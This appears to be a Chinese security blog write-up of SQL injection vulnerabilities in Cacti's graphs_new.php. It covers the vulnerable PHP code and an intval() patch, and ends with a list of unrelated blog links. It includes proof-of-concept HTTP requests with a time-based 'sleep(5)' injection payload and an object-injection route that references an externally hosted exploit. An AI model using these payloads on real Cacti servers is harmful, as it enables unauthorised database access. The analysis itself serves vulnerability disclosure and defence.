catalogue

. 漏洞描述

. 漏洞触发条件

. 漏洞影响范围

. 漏洞代码分析

. 防御方法

. 攻防思考

1. 漏洞描述

other SQL injection vulnerability via graphs_new.php in cacti was found, reported to the bug http://bugs.cacti.net/view.php?id=2652

Relevant Link:

http://bobao.360.cn/snapshot/index?id=146936

2. 漏洞触发条件

0x1: POC1: SQL Inject

POST /cacti/graphs_new.php HTTP/1.1

Host: 192.168.217.133

Proxy-Connection: keep-alive

Cache-Control: max-age=

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://192.168.217.133 [^]

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36

Content-Type: application/x-www-form-urlencoded

DNT: 1

Referer: http://192.168.217.133/cacti/graphs_new.php?host_id=3 [^]

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4

Cookie: 1c4af7f2e90e3a789e67a8e3acd2372f=8a83va6ijomgf7qdgfpcl8l1p2; Cacti=j8chtc1ppq4n7viqkbah6c4tv2

Content-Length: 189

__csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save

0x2: POC2: Object Inject

. Login

. POST  http://target/cacti/graphs_new.php

   Data: __csrf_magic=sid%3A55c34c49f0a1e4abf5739766855abdfa96fbc91b%2C1448716384&action=save&save_component_new_graphs=&host_id=&selected_graphs_array=[injection]

    {Injection exp can be found on my server: http://pandas.pw/cacti.exp}

. mysql log: select graph_template_id from snmp_query_graph where id= and benchmark(,sha1())--

3. 漏洞影响范围
4. 漏洞代码分析

0x1: Vuls-1: Object Inject To SQL Inject

/graphs_new.php

/* set default action */

if (!isset($_REQUEST["action"])) { $_REQUEST["action"] = ""; }

switch ($_REQUEST["action"]) {

    case 'save':

        //track function form_save

        form_save();

        break;

    case 'query_reload':

        host_reload_query();

        header("Location: graphs_new.php?host_id=" . $_GET["host_id"]);

        break;

    default:

        include_once("./include/top_header.php");

        graphs();

        include_once("./include/bottom_footer.php");

        break;

}

form_save();

function form_save()

{

    ..

    if (isset($_POST["save_component_new_graphs"]))

    {

        //Track function host_new_graphs_save()

        host_new_graphs_save();

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);

    }

}

host_new_graphs_save();

function host_new_graphs_save()

{

    //variable $selected_graphs_array just unserialized the POST variable which we can control without filter.

    $selected_graphs_array = unserialize(stripslashes($_POST["selected_graphs_array"]));

    ..

    //Then the variable goes into a  three-dimensional array , and finally the dirty data we can control enter into the select database query, which caused a SQL injection.

    $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);

    ..

}

0x2: Vuls-2: SQL Injection

function form_save()

{

    if (isset($_POST["save_component_graph"]))

    {

        /* summarize the 'create graph from host template/snmp index' stuff into an array */

        while (list($var, $val) = each($_POST))

        {

            if (preg_match('/^cg_(\d+)$/', $var, $matches))

            {

                $selected_graphs["cg"]{$matches[]}{$matches[]} = true;

            }

            //cg_g is not filtered

            elseif (preg_match('/^cg_g$/', $var))

            {

                if ($_POST["cg_g"] > )

                {

                    $selected_graphs["cg"]{$_POST["cg_g"]}{$_POST["cg_g"]} = true;

                }

            }

            elseif (preg_match('/^sg_(\d+)_([a-f0-9]{32})$/', $var, $matches))

            {

                $selected_graphs["sg"]{$matches[]}{$_POST{"sgg_" . $matches[]}}{$matches[]} = true;

            }

        }

        if (isset($selected_graphs))

        {

            //外部输入参数带入host_new_graphs中

            host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);

            exit;

        }

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);

    }

    if (isset($_POST["save_component_new_graphs"])) {

        host_new_graphs_save();

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);

    }

}

host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);

function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {

    /* we use object buffering on this page to allow redirection to another page if no

    fields are actually drawn */

    ob_start();

    include_once("./include/top_header.php");

    print "<form method='post' action='graphs_new.php'>\n";

    $snmp_query_id = ;

    $num_output_fields = array();

    while (list($form_type, $form_array) = each($selected_graphs_array)) {

        while (list($form_id1, $form_array2) = each($form_array)) {

            if ($form_type == "cg") {

                //sql injection in graph_template_id

                $graph_template_id = $form_id1; 

                html_start_box("<strong>Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "", "center", "");

Relevant Link:

http://seclists.org/fulldisclosure/2015/Dec/att-57/cacti_sqli%281%29.txt

http://bugs.cacti.net/view.php?id=2652

5. 防御方法

/graphs_new.php

function host_new_graphs_save()

{

    ..

    /*$graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);*/

    $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . intval($snmp_query_array["snmp_query_graph_id"]));

    ..

}

/graphs_new.php

function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {

    /* we use object buffering on this page to allow redirection to another page if no

    fields are actually drawn */

    ob_start();

    include_once("./include/top_header.php");

    print "<form method='post' action='graphs_new.php'>\n";

    $snmp_query_id = ;

    $num_output_fields = array();

    while (list($form_type, $form_array) = each($selected_graphs_array)) {

        while (list($form_id1, $form_array2) = each($form_array)) {

            if ($form_type == "cg") {

                //sql injection in graph_template_id

                $graph_template_id = $form_id1;

                /**/

                $graph_template_id = intval($graph_template_id);

                /**/

                html_start_box("<strong>Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "", "center", "");

Relevant Link:

http://www.cacti.net/download_cacti.php

6. 攻防思考

Copyright (c) 2016 Little5ann All rights reserved

Cacti /graphs_new.php SQL Injection Vulnerability的更多相关文章

  1. FlarumChina SQL injection Vulnerability

    First,We need to download our vulnerable program in GitHub links:https://github.com/skywalker512/Fla ...

  2. DRUPAL-PSA-CORE-2014-005 && CVE-2014-3704 Drupal 7.31 SQL Injection Vulnerability /includes/database/database.inc Analysis

    目录 . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Use Drupal to build everything from perso ...

  3. Dede(织梦) CMS SQL Injection Vulnerability

    测试方法: @Sebug.net   dis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! # Dede Cms All Versions Sql Vulnerability ...

  4. MyBB 18 SQL Injection Vulnerability

    <?php error_reporting(0); ?> <form method="post" action=""> Input a ...

  5. Zabbix 3.0.3 SQL Injection

    Zabbix version 3.0.3 suffers from a remote SQL injection vulnerability. ============================ ...

  6. Portswigger web security academy:SQL injection

    Portswigger web security academy:SQL injection 目录 Portswigger web security academy:SQL injection SQL ...

  7. CVE: 2014-6271、CVE: 2014-7169 Bash Specially-crafted Environment Variables Code Injection Vulnerability Analysis

    目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 为了理解这个漏 ...

  8. SQL injection

    SQL injection is a code injection technique, used to attack data-driven applications, in which malic ...

  9. ref:Manual SQL injection discovery tips

    ref:https://gerbenjavado.com/manual-sql-injection-discovery-tips/ Manual SQL injection discovery tip ...

随机推荐

  1. DocOptimizer 0.9.0 Beta Released

    DocOptimizer 是一个文档优化工具,它通过移除Excel中多余的单元格:将嵌入的OLE替换成图片:移除文档中的隐藏信息:优化文档中的图片等等手段,将Office或PDF文件压缩20%-90% ...

  2. UDP的坏处

    众所周知,UDP是一个面向无连接的协议.通信时不可靠的.这就会出现一些问题 (1)数据报丢失 因为是无连接,的所以可以用recvfrom和sendto来接收和发送消息,如果socket是阻塞的,那么当 ...

  3. Spring MVC 前后端 Json 方式交互和处理

    众所周知,在mvc中,数据是在各个层次之间进行流转是一个不争的事实. 而这种流转,也就会面临一些困境,这些困境,是由于数据在不同世界中的表现形式不同而造成的.   数据在页面上是一个扁平的,不带数据类 ...

  4. opencv6.4-imgproc图像处理模块之直方图与模板

    接opencv6.3-imgproc图像处理模块之边缘检测 九.直方图的相关操作 直方图是图像中像素强度分布的图形表达方式:它统计了每一个强度值所具有的像素个数 上图是一个灰色图像,通过对图像的每个不 ...

  5. Code Review 五问五答

    Code Review 是什么? Code Review即代码审查,程序猿相互审核对方的代码. Code Review能获得什么好处? 提高代码可维护性 你写的代码不再只有编译器看了,你得写出审核人能 ...

  6. 开发WP版本的大菠萝英雄榜

    前言 想当年Team有无数人在玩大菠萝,我被忽悠进来做肉盾,选了蛮子,从1.0开始,经历了103.105.108.2.0.2.1.这个游戏对我最大的帮助是学习了不同的技术,比如XAML.比如xcode ...

  7. 匈牙利算法(codevs2776)

    type node=^link; link=record des:longint; next:node; end; var n,m,i,t,num:longint; p:node; nd:..] of ...

  8. class文件概述

    将java代码编译后会产生class文件,并且一个clas文件会对应唯一一个java类或者接口.下面对一个通过一个简单的例子来简述一下class文件的结构. java代码 public class J ...

  9. 深入浅出ASP.NET MVC5系列之一

    前言 为避免看官乏味,本系列博客限定在较新的.Net framework 4.5.1,Asp.net MVC5,IIS 7.X集成模式. 对于微软应用层的技术.我向来不舍得花太多时间学习.但又由于公司 ...

  10. 9-cat 简明笔记

    连接或显示文件 cat [options] [file-list] 参数 file-list 是cat要处理的单个文件路径名或多个文件路径名列表,如果不指定任何参数或指定一个连字符(-)代替文件名,c ...